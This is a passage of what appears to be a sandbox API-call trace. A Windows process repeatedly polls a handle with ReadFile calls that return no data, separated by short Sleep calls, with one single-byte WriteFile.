	[0202.491] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0202.491] GetLastError () returned 0x218
	[0202.491] Sleep (dwMilliseconds=0xa) 
	[0202.504] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0202.504] GetLastError () returned 0x218
	[0202.504] Sleep (dwMilliseconds=0xa) 
	[0202.520] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0202.520] GetLastError () returned 0x218
	[0202.520] Sleep (dwMilliseconds=0xa) 
	[0202.535] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0202.536] GetLastError () returned 0x218
	[0202.536] Sleep (dwMilliseconds=0xa) 
	[0202.552] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0202.552] GetLastError () returned 0x218
	[0202.552] Sleep (dwMilliseconds=0xa) 
	[0202.567] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0202.567] GetLastError () returned 0x218
	[0202.567] Sleep (dwMilliseconds=0xa) 
	[0202.583] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0202.583] GetLastError () returned 0x218
	[0202.583] Sleep (dwMilliseconds=0xa) 
	[0202.632] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0202.632] GetLastError () returned 0x218
	[0202.632] Sleep (dwMilliseconds=0xa) 
	[0202.676] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0202.676] GetLastError () returned 0x218
	[0202.676] Sleep (dwMilliseconds=0xa) 
	[0202.701] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0202.701] GetLastError () returned 0x218
	[0202.701] Sleep (dwMilliseconds=0xa) 
	[0202.707] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0202.707] GetLastError () returned 0x218
	[0202.707] Sleep (dwMilliseconds=0xa) 
	[0202.723] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0202.723] GetLastError () returned 0x218
	[0202.723] Sleep (dwMilliseconds=0xa) 
	[0202.741] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0202.741] GetLastError () returned 0x218
	[0202.741] Sleep (dwMilliseconds=0xa) 
	[0202.754] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0202.754] GetLastError () returned 0x218
	[0202.754] Sleep (dwMilliseconds=0xa) 
	[0202.770] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0202.770] GetLastError () returned 0x218
	[0202.770] Sleep (dwMilliseconds=0xa) 
	[0202.785] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0202.785] GetLastError () returned 0x218
	[0202.785] Sleep (dwMilliseconds=0xa) 
	[0202.815] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0202.815] GetLastError () returned 0x218
	[0202.815] Sleep (dwMilliseconds=0xa) 
	[0202.850] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0202.850] GetLastError () returned 0x218
	[0202.850] Sleep (dwMilliseconds=0xa) 
	[0202.894] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0202.894] GetLastError () returned 0x218
	[0202.894] Sleep (dwMilliseconds=0xa) 
	[0202.920] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0202.920] GetLastError () returned 0x218
	[0202.920] Sleep (dwMilliseconds=0xa) 
	[0202.926] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0202.926] GetLastError () returned 0x218
	[0202.926] Sleep (dwMilliseconds=0xa) 
	[0202.942] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0202.942] GetLastError () returned 0x218
	[0202.942] Sleep (dwMilliseconds=0xa) 
	[0202.957] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0202.957] GetLastError () returned 0x218
	[0202.957] Sleep (dwMilliseconds=0xa) 
	[0202.973] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0202.973] GetLastError () returned 0x218
	[0202.973] Sleep (dwMilliseconds=0xa) 
	[0202.988] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0202.988] GetLastError () returned 0x218
	[0202.991] Sleep (dwMilliseconds=0xa) 
	[0203.003] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0203.003] GetLastError () returned 0x218
	[0203.003] Sleep (dwMilliseconds=0xa) 
	[0203.019] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0203.019] GetLastError () returned 0x218
	[0203.019] Sleep (dwMilliseconds=0xa) 
	[0203.069] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0203.069] GetLastError () returned 0x218
	[0203.069] Sleep (dwMilliseconds=0xa) 
	[0203.120] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0203.120] GetLastError () returned 0x218
	[0203.120] Sleep (dwMilliseconds=0xa) 
	[0203.141] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0203.141] GetLastError () returned 0x218
	[0203.141] Sleep (dwMilliseconds=0xa) 
	[0203.144] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0203.144] GetLastError () returned 0x218
	[0203.144] Sleep (dwMilliseconds=0xa) 
	[0203.160] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0203.160] GetLastError () returned 0x218
	[0203.160] Sleep (dwMilliseconds=0xa) 
	[0203.176] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0203.176] GetLastError () returned 0x218
	[0203.176] Sleep (dwMilliseconds=0x3e8) 
	[0204.207] WriteFile (in: hFile=0x258, lpBuffer=0x116f4dc, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x116f4d4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x116f4d4, lpOverlapped=0x0) returned 0
	[0204.207] Sleep (dwMilliseconds=0xa) 
	[0204.228] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0204.228] GetLastError () returned 0x218
	[0204.228] Sleep (dwMilliseconds=0xa) 
	[0204.239] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0204.239] GetLastError () returned 0x218
	[0204.239] Sleep (dwMilliseconds=0xa) 
	[0204.251] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0204.251] GetLastError () returned 0x218
	[0204.251] Sleep (dwMilliseconds=0xa) 
	[0204.267] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0204.267] GetLastError () returned 0x218
	[0204.267] Sleep (dwMilliseconds=0xa) 
	[0204.282] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0204.283] GetLastError () returned 0x218
	[0204.283] Sleep (dwMilliseconds=0xa) 
	[0204.298] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0204.298] GetLastError () returned 0x218
	[0204.298] Sleep (dwMilliseconds=0xa) 
	[0204.314] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0204.314] GetLastError () returned 0x218
	[0204.314] Sleep (dwMilliseconds=0xa) 
	[0204.329] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0204.329] GetLastError () returned 0x218
	[0204.329] Sleep (dwMilliseconds=0xa) 
	[0204.377] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0204.377] GetLastError () returned 0x218
	[0204.378] Sleep (dwMilliseconds=0xa) 
	[0204.424] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0204.424] GetLastError () returned 0x218
	[0204.424] Sleep (dwMilliseconds=0xa) 
	[0204.449] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0204.449] GetLastError () returned 0x218
	[0204.449] Sleep (dwMilliseconds=0xa) 
	[0204.454] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0204.454] GetLastError () returned 0x218
	[0204.455] Sleep (dwMilliseconds=0xa) 
	[0204.470] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0204.470] GetLastError () returned 0x218
	[0204.470] Sleep (dwMilliseconds=0xa) 
	[0204.486] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0204.486] GetLastError () returned 0x218
	[0204.486] Sleep (dwMilliseconds=0xa) 
	[0204.501] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0204.501] GetLastError () returned 0x218
	[0204.501] Sleep (dwMilliseconds=0xa) 
	[0204.517] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0204.517] GetLastError () returned 0x218
	[0204.517] Sleep (dwMilliseconds=0xa) 
	[0204.532] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0204.532] GetLastError () returned 0x218
	[0204.533] Sleep (dwMilliseconds=0xa) 
	[0204.549] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0204.549] GetLastError () returned 0x218
	[0204.549] Sleep (dwMilliseconds=0xa) 
	[0204.597] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0204.597] GetLastError () returned 0x218
	[0204.597] Sleep (dwMilliseconds=0xa) 
	[0204.642] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0204.642] GetLastError () returned 0x218
	[0204.642] Sleep (dwMilliseconds=0xa) 
	[0204.688] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0204.688] GetLastError () returned 0x218
	[0204.688] Sleep (dwMilliseconds=0xa) 
	[0204.704] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0204.704] GetLastError () returned 0x218
	[0204.704] Sleep (dwMilliseconds=0xa) 
	[0204.721] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0204.721] GetLastError () returned 0x218
	[0204.721] Sleep (dwMilliseconds=0xa) 
	[0204.735] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0204.735] GetLastError () returned 0x218
	[0204.735] Sleep (dwMilliseconds=0xa) 
	[0204.751] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0204.751] GetLastError () returned 0x218
	[0204.751] Sleep (dwMilliseconds=0xa) 
	[0204.767] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0204.767] GetLastError () returned 0x218
	[0204.767] Sleep (dwMilliseconds=0xa) 
	[0204.782] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0204.782] GetLastError () returned 0x218
	[0204.782] Sleep (dwMilliseconds=0xa) 
	[0204.798] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0204.798] GetLastError () returned 0x218
	[0204.798] Sleep (dwMilliseconds=0xa) 
	[0204.847] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0204.847] GetLastError () returned 0x218
	[0204.847] Sleep (dwMilliseconds=0xa) 
	[0204.891] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0204.891] GetLastError () returned 0x218
	[0204.891] Sleep (dwMilliseconds=0xa) 
	[0204.909] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0204.909] GetLastError () returned 0x218
	[0204.909] Sleep (dwMilliseconds=0xa) 
	[0204.922] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0204.922] GetLastError () returned 0x218
	[0204.922] Sleep (dwMilliseconds=0xa) 
	[0204.938] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0204.939] GetLastError () returned 0x218
	[0204.939] Sleep (dwMilliseconds=0xa) 
	[0204.953] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0204.953] GetLastError () returned 0x218
	[0204.954] Sleep (dwMilliseconds=0xa) 
	[0204.969] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0204.969] GetLastError () returned 0x218
	[0204.969] Sleep (dwMilliseconds=0xa) 
	[0204.985] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0204.985] GetLastError () returned 0x218
	[0204.985] Sleep (dwMilliseconds=0xa) 
	[0205.034] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0205.034] GetLastError () returned 0x218
	[0205.034] Sleep (dwMilliseconds=0xa) 
	[0205.078] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0205.078] GetLastError () returned 0x218
	[0205.079] Sleep (dwMilliseconds=0xa) 
	[0205.125] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0205.125] GetLastError () returned 0x218
	[0205.125] Sleep (dwMilliseconds=0xa) 
	[0205.148] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0205.148] GetLastError () returned 0x218
	[0205.148] Sleep (dwMilliseconds=0xa) 
	[0205.156] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0205.156] GetLastError () returned 0x218
	[0205.156] Sleep (dwMilliseconds=0xa) 
	[0205.172] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0205.172] GetLastError () returned 0x218
	[0205.172] Sleep (dwMilliseconds=0xa) 
